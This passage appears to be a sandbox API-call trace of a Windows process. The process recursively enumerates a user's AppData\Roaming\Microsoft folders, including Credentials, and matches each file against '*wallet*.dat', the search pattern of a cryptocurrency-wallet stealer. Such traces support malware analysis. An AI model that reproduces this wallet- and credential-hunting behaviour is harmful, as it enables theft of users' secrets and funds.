ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x42132, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="ISO690.XSL", cAlternateFileName="")) returned 1 [0207.400] StrCmpCA (pszStr1="ISO690.XSL", pszStr2=".") returned 27 [0207.400] StrCmpCA (pszStr1="ISO690.XSL", pszStr2="..") returned 27 [0207.400] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 77 [0207.400] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0207.400] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 39 [0207.400] PathMatchSpecA (pszFile="ISO690.XSL", pszSpec="*wallet*.dat") returned 0 [0207.400] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL\\*") returned 79 [0207.400] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec07b6, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec07b6, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x42132, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="I", cAlternateFileName="J")) returned 0xffffffff [0207.400] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec4265, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec4265, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="ISO690Nmerical.XSL", cAlternateFileName="ISO690~1.XSL")) returned 1 [0207.400] StrCmpCA (pszStr1="ISO690Nmerical.XSL", pszStr2=".") returned 27 [0207.400] StrCmpCA (pszStr1="ISO690Nmerical.XSL", pszStr2="..") returned 27 [0207.400] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 85 [0207.400] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0207.400] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 47 [0207.400] PathMatchSpecA (pszFile="ISO690Nmerical.XSL", pszSpec="*wallet*.dat") returned 0 [0207.400] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL\\*") returned 87 [0207.400] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec4265, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec4265, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="I", cAlternateFileName="J")) returned 0xffffffff [0207.401] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ecb8b4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ecb8b4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="MLASeventhEditionOfficeOnline.xsl", cAlternateFileName="MLASEV~1.XSL")) returned 1 [0207.401] StrCmpCA (pszStr1="MLASeventhEditionOfficeOnline.xsl", pszStr2=".") returned 31 [0207.401] StrCmpCA (pszStr1="MLASeventhEditionOfficeOnline.xsl", pszStr2="..") returned 31 [0207.401] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 100 [0207.401] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0207.401] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 62 [0207.401] PathMatchSpecA (pszFile="MLASeventhEditionOfficeOnline.xsl", pszSpec="*wallet*.dat") returned 0 [0207.401] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl\\*") returned 102 [0207.401] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ecb8b4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ecb8b4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="M", cAlternateFileName="J")) returned 0xffffffff [0207.401] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed06d2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed06d2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b432832, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="SIST02.XSL", cAlternateFileName="")) returned 1 [0207.401] StrCmpCA (pszStr1="SIST02.XSL", pszStr2=".") returned 37 [0207.401] StrCmpCA (pszStr1="SIST02.XSL", pszStr2="..") returned 37 [0207.401] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 77 [0207.401] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0207.401] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 39 [0207.401] PathMatchSpecA (pszFile="SIST02.XSL", pszSpec="*wallet*.dat") returned 0 [0207.401] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL\\*") returned 79 [0207.401] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed06d2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed06d2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b432832, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="S", cAlternateFileName="J")) returned 0xffffffff [0207.402] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed2ca5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed2ca5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b500917, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 1 [0207.402] StrCmpCA (pszStr1="TURABIAN.XSL", pszStr2=".") returned 38 [0207.402] StrCmpCA (pszStr1="TURABIAN.XSL", pszStr2="..") returned 38 [0207.402] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 79 [0207.402] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0207.402] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 41 [0207.402] PathMatchSpecA (pszFile="TURABIAN.XSL", pszSpec="*wallet*.dat") returned 0 [0207.402] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL\\*") returned 81 [0207.402] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed2ca5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed2ca5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b500917, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.402] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed2ca5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed2ca5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b500917, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 0 [0207.402] FindClose (in: hFindFile=0x5e7a48 | out: hFindFile=0x5e7a48) returned 1 [0207.403] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Style", cAlternateFileName="")) returned 0 [0207.404] FindClose (in: hFindFile=0x5e7e08 | out: hFindFile=0x5e7e08) returned 1 [0207.404] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0207.404] StrCmpCA (pszStr1="Credentials", pszStr2=".") returned 21 [0207.404] StrCmpCA (pszStr1="Credentials", pszStr2="..") returned 21 [0207.404] wsprintfA (in: param_1=0x19ca38, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 59 [0207.404] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0207.404] wsprintfA (in: param_1=0x19cb40, param_2="%s\\%s" | out: param_1="Microsoft\\Credentials") returned 21 [0207.404] PathMatchSpecA (pszFile="Credentials", pszSpec="*wallet*.dat") returned 0 [0207.404] wsprintfA (in: param_1=0x19c708, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 61 [0207.404] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e48 [0207.404] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.404] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.404] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.404] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.405] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0207.405] FindClose (in: hFindFile=0x5e7e48 | out: hFindFile=0x5e7e48) returned 1 [0207.405] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x816a7a21, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0207.405] StrCmpCA (pszStr1="Document Building Blocks", pszStr2=".") returned 22 [0207.405] StrCmpCA (pszStr1="Document Building Blocks", pszStr2="..") returned 22 [0207.405] wsprintfA (in: param_1=0x19ca38, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned 72 [0207.405] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0207.405] wsprintfA (in: param_1=0x19cb40, param_2="%s\\%s" | out: param_1="Microsoft\\Document Building Blocks") returned 34 [0207.405] PathMatchSpecA (pszFile="Document Building Blocks", pszSpec="*wallet*.dat") returned 0 [0207.405] wsprintfA (in: param_1=0x19c708, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned 74 [0207.405] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7a48 [0207.406] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.406] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.406] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.406] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.406] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="1033", cAlternateFileName="")) returned 1 [0207.406] StrCmpCA (pszStr1="1033", pszStr2=".") returned 3 [0207.406] StrCmpCA (pszStr1="1033", pszStr2="..") returned 3 [0207.406] wsprintfA (in: param_1=0x19c3b0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned 77 [0207.406] StrCmpCA (pszStr1="Microsoft\\Document Building Blocks", pszStr2="") returned 77 [0207.406] wsprintfA (in: param_1=0x19c4b8, param_2="%s\\%s" | out: param_1="Microsoft\\Document Building Blocks\\1033") returned 39 [0207.406] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0207.406] wsprintfA (in: param_1=0x19c080, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned 79 [0207.406] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e08 [0207.406] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.407] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.407] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.407] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.407] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="16", cAlternateFileName="")) returned 1 [0207.407] StrCmpCA (pszStr1="16", pszStr2=".") returned 3 [0207.407] StrCmpCA (pszStr1="16", pszStr2="..") returned 3 [0207.407] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned 80 [0207.407] StrCmpCA (pszStr1="Microsoft\\Document Building Blocks\\1033", pszStr2="") returned 77 [0207.407] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Document Building Blocks\\1033\\16") returned 42 [0207.407] PathMatchSpecA (pszFile="16", pszSpec="*wallet*.dat") returned 0 [0207.407] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*") returned 82 [0207.407] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x817190ef, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e48 [0207.408] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.408] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x817190ef, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.408] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.408] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.408] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817190ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x817190ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5ca4c63b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 1 [0207.408] StrCmpCA (pszStr1="Built-In Building Blocks.dotx", pszStr2=".") returned 20 [0207.408] StrCmpCA (pszStr1="Built-In Building Blocks.dotx", pszStr2="..") returned 20 [0207.408] wsprintfA (in: param_1=0x19b6a0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 110 [0207.408] StrCmpCA (pszStr1="Microsoft\\Document Building Blocks\\1033\\16", pszStr2="") returned 77 [0207.408] wsprintfA (in: param_1=0x19b7a8, param_2="%s\\%s" | out: param_1="Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 72 [0207.408] PathMatchSpecA (pszFile="Built-In Building Blocks.dotx", pszSpec="*wallet*.dat") returned 0 [0207.408] wsprintfA (in: param_1=0x19b370, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx\\*") returned 112 [0207.408] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx\\*", lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817190ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x817190ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5ca4c63b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="B", cAlternateFileName="J")) returned 0xffffffff [0207.409] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817190ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x817190ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5ca4c63b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 0 [0207.409] FindClose (in: hFindFile=0x5e7e48 | out: hFindFile=0x5e7e48) returned 1 [0207.409] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="16", cAlternateFileName="")) returned 